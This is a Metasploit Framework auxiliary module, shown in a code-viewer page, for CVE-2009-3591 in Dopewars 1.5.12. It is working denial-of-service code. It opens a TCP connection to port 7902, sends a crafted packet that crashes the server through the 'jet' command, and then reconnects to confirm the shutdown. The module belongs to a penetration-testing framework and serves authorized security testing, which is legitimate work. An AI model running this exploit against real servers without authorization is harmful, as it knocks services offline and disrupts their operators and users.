Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/misc/dopewars.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'English'
7
class MetasploitModule < Msf::Auxiliary
8
include Msf::Exploit::Remote::Tcp
9
include Msf::Auxiliary::Dos
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Dopewars Denial of Service',
16
'Description' => %q{
17
The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to
18
a lack of input validation.
19
},
20
'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ],
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2009-3591' ],
24
[ 'OSVDB', '58884' ],
25
[ 'BID', '36606' ]
26
],
27
'DisclosureDate' => '2009-10-05',
28
'Notes' => {
29
'Stability' => [CRASH_SERVICE_DOWN],
30
'SideEffects' => [],
31
'Reliability' => []
32
}
33
)
34
)
35
36
register_options([Opt::RPORT(7902)])
37
end
38
39
def run
40
# The jet command is vulnerable.
41
# Program received signal SIGSEGV, Segmentation fault.
42
# [Switching to Thread 0xb74916c0 (LWP 30638)]
43
# 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at
44
# serverside.c:525
45
# 525 dopelog(4, LF_SERVER, "%s jets to %s",
46
#
47
connect
48
pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"
49
print_status('Sending dos packet...')
50
sock.put(pkt)
51
disconnect
52
53
print_status('Checking for success...')
54
select(nil, nil, nil, 2)
55
begin
56
connect
57
rescue ::Interrupt
58
raise $ERROR_INFO
59
rescue ::Rex::ConnectionRefused
60
print_good('Dopewars server successfully shut down!')
61
else
62
print_error('DOS attack unsuccessful')
63
ensure
64
disconnect
65
end
66
end
67
end
68
69